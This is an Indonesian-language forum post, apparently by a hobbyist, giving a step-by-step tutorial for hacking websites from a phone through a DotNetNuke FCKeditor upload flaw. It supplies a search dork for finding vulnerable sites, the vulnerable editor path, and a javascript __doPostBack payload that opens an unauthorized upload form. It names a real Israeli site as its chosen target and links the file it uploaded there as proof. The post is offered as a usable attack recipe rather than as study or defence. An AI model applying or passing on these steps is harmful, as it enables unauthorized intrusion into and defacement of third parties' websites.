Hack Website Lewat HP
Mungkin kedengarannya gila bila membaca
judul diatas….! ‘ it’s imposible‘ kata beberapa
orang, Saya hanya seorang Newbie yg selalu
pgn mencoba, maaf bila postingan ini dah basi
dan untuk para master jangan dibaca ya coz
dah jadul.
Pada dasarnya aplikasi web browser di HP
maupun di PC it cara kerjanya sama,yg
membedakan adalah system yg bekerja
mendukung applikasi it sendiri (Java, SymBian,
Linux, Windows, Android etc). Dan ukuran atau
kapasitas serta kemampuan menampilkan
web. Tapi pada dasarnya cara kerjanya tetap.
Sama, jadi apa yg bisa dilakukan lwt
pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit
web dgn cara hack web melalui DNN (dot net
nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:
1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya
adalah:
1. Operamini 5.0 mendukung multi tab jadi
cocok buat mencari target dan mengetesnya
tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi
paste,pilih text dan lgsg mensearchnya dlm
sekali klik ditab yg sama ataupun membukanya
di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr
yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata
vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab
slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2
melakukan hack web dgn DNN exploit melalui
opera mini.
Pertama: pastikan anda masih mempunyai
saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di
kolom google search dorknya->
inurl:”/portals/0″
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali
ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di
keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain
sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan
bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita
coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/
fcklinkgallery.aspx
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/
HtmlEditorProviders/ Fck/fcklinkgallery.aspx
Lakukan it pada smua target yg udah kamu
buka pada browser operamini 5.0 km.biar gak
bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di
bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/
Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada
opera 5.0 di hape saya kurang respon pada
perintahupload. Proses upload berjalan tapi
file tidak terupload dan begitu di coba di v 4.2
sukses terupload. Tapi bila di v.5.0 km bisa ya
lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2
kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar
operamini kamu dan ganti dgn script di bawah
ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom
kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km
simpan di hape km.
SUCCESS..! you cAn hacked a web site from
mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/
xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk
copas,select text and open new tab.
-sekian-
